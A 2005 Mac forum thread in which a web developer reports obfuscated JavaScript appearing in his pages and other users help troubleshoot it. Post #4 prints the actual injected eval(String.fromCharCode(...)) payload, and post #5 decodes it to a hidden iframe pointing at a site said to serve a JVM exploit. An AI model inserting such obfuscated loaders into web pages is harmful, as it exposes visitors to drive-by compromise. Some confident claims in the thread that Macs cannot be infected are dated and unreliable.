Do I have a real virus? Oh geezus...

Discussion in 'General Mac Discussion' started by jvaska, Mar 4, 2005.

  1. macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #1
    Years ago there was a famous virus that had something to do with http://padonack.info...

    When I surfing my own site sometimes mysterious javascript inserts itself into the beginning of my document (I can tell by watching the activity window in Safari). This is happening on plain html pages that have no includes or anything. I'm a web dev since '95 so I know a few things...but I can't explain this yet.

    Except, that it's from my own computer. Both computers on my network are having the same problem (outside computers are not).

    I would venture that either I have a real virus on my machines or it's on my router (which I'm trying to find the manual for).

    Kind of worried...it's clear that they are accessing info via a java applet on their end...at a page named 'xxx.htm'...

    Anybody else ever see something like this on their end?
     
  2. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #2
    I'm sorry, but have no idea what you're talking about... unless your webserver (Apache?) adds something, or you subscribe to an adservice (or whatever) then JavaScripts does not insert it self into pages...

    If you're running this on Macs with OS X (which you don't say anything about, but I'll assume you are), it's highly unlikely a virus is to blame, you'd actually have the first known infected machines...
     
  3. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #3
    Sorry, I'm freaking out herre...

    I'm on OSX 10.3.7 using Safari 1.2.4...

    My Apache is not configured to add anything. My AdBlock has never posed any problems of any sort...

    My webshost claims it's me...and from what I can determine, the problem is coming my end of things (since others are not experiencing the problem while visiting my site).

    Is it possible that the router could be doing this? I don't know much about them...

    Trying to figure this out...is there a way with Apple Firewall to block outgoing communications with a particular ip address? I can't find this...
     
  4. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #4
    I'm surfing with Adblock.css and my plugins turned off and it's still happening. And with Firefox too...

    This is not good...

    PHP:
    <script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,32,115,114,99,61,104,116,116,112,58,47,47,112,97,100,111,110,97,107,46,105,110,102,111,47,102,97,47,32,62,60,47,105,102,114,97,109,101,62,39,41,59))</script>
    which spells out "document.write('');"

    It does this on static html pages too...
     
  5. macrumors 65816

    broken_keyboard

    Joined:
    Apr 19, 2004
    Location:
    Secret Moon base
    #5
    From what I can see it will execute the following:

    document.write('<iframe height=1 width=1 src=http://padonak.info/fa/></iframe>

    Searching the web, it seems that site may contain a jar file that uses a JVM exploit to compromise your machine.
     
  6. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #6
    Yes, that's why I'm pretty freaked out by this... If you search on padonak and hangup you'll find more info...

    I'm trying to get the webhost to dig deeper into the matter but yesterday they flat out said it's me, not them.

    Actually, if there are any mac people out there who might be able to take a look at this - just to see if they can get the same javascript code that I'm getting perhaps they could IM me?

    Thanks...
     
  7. macrumors G4

    Applespider

    Joined:
    Jan 20, 2004
    Location:
    looking through rose-tinted spectacles...
    #7
    I'm on my work PC at the moment but did find some info about recent padonak attacks that you (or others might find useful). IT appears that its payload is Windows specific but that on some PCs it was getting round Norton etc

    This seems to be the most common explanation - not sure if it triggers anything with you. Most people say that it ended up being installed onto their webserver, particularly when they ran forum software. Posting comments on the folder led to the malicious include.

    http://msmvps.com/donna/archive/2004/07/03/9463.aspx

    Good luck
     
  8. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #8
    From this site:
    Sound very much like a Windows problem, first and foremost... how it can affect a Mac is beyond me, even more after skimming through this forum...

    Maybe this is a good time to actually run Virex or another AV software and see what they find... ;) ...or ask if your Webservice runs on a PC...?
     
  9. macrumors 65816

    redeye be

    Joined:
    Jan 27, 2005
    Location:
    BXL
    #9
    You could always call this guy and ask him what's up
    if it is a virus you would make the history books! Wouldn't that be great? :eek:

    Good luck.
     
  10. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #10
    Yep...the problem I have is that it's interfering with my css for whatever reason. I can see the iframe loading onto the page as it's leaving a little space...

    I don't have any kind of system for people to insert comments, etc onto my site...I'm not running a blog...

    So, do I breathe a little easier thinking that it's something server-side and not me? I hope so...I don't want to be the first...

    Thanks...
     
  11. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #11
    By the way: What is the address to your site? It would be interesting to see first hand...
     
  12. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #12
    I really don't like putting my url into forums...IM me on ichat and I'll give you the link...
     
  13. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #13
    I don't really get that, why have a secret homepage...? :rolleyes:

    But, anyhow, what I really want to know is the system your page is running on... Can you run your homepage through Whats that site running? (it needs the whole URL, including the http://)...?

    My site (http://www.geek.no/), according to this test runs on Linux, with a Apache/2.0.51 (Debian GNU/Linux) DAV/2 FrontPage/5.0.2.2635 PHP/4.3.8-12 mod_ssl/2.0.51 OpenSSL/0.9.7d webserver which is owned by Dataguard AS

    Now if your webhost runs on a OS in the Windows family and maybe even an IIS server then we have a very strong suspect, and your machine is most likely as healthy as ever... ;)
     
  14. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #14
    It's not secret, I just don't want to post it in a forum. I never do...

    Apache/1.3.31 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a
     
  15. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #15
    Fair enough... ;)

    Hmmm... quite a little problem this... have you tried a serch for a proc.jar file...?

    And, what happens if you make a REALLY simple html file and upload that... does that too suddenly appear to have a foreign iframe in it...?
     
  16. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #16
    Don't have proc.jar on my system (or search doesn't find it)...very simple html files do have the iframe...

    Normally, my support is very fast. They are clearly thinking this one over before they get back to me. Fingers crossed they find the culprit...

    Thanks, v
     
  17. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #17
    Well if it didn't have an iframe when you view it through localhost at your own machine and therefore have to be clean when leaving your machine, then it's most likely something that get added by your webhost's server...
     
  18. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #18
    Ok, here's an idea: Make a simple, but typical html page, with a likewise simple css file. E-mail them to me at einstein<at>c2i<dot>net with a spesific Subject (that's my "spam"-account so most incoming mail from unknowns will be caught by the junk filter) and I'll upload them on my site and post back the link, if that's clean and your webhost still claims it's you, you can give them that link and say: Why isn't the iframe/script added when my file is uploaded here, then...???
     
  19. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #19
    Confirmed...this is a local issue...trying to go forward from here...

    Hope this is not a virus...

    It's affecting Safari and Firefox...not IE...
     
  20. macrumors G4

    Joined:
    Jul 17, 2002
    Location:
    USA
    #20
    You do not have a virus. If you did, you would be the first MacOS X user to get one. The only way for that to happen is for you to have written it, which you did not. At any rate, I don't entirely understand the nature of your problem. However, in the last couple of weeks, I have heard of ISPs inserting pop-ups between websites and surfers without the cooperation of the websites. If your site is hosted on your local computer, you can disconnect your computer from the 'net to see if the mysterious code disappears.
     
  21. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #21
    The same problem is on my two machines...I hate to say this...but is it?

    I'm not sure what to do right now. Should I just backup and reinstall?

    Oh geezus...
     
  22. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #22
    Site is not hosted locally...

    Would a host insert javascript that clearly drives to a documented hack site?

    Nobody can reproduce this. PC's and Mac's now...nobody else has this except for me. On two machines in my network...
     
  23. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #23
    Let's see if we can't find the problem (if it really are local, which I strongly doubt, have you checked your ISP...?):
    Do you have any "funny" plugins/addons/extentions that you use, either installed directly in your browser (like the Adblock extention in Firefox) or something in your home folder ~/Library/Internet Plug-Ins or systemwide /Library/Internet Plug-Ins ?
     
  24. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #24
    Some (free) hosts add a script (or some sort of frame) to all pages making them displaying ads...
     
  25. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #25
    My host is not of that caliber...they woudln't do that...
     

Share This Page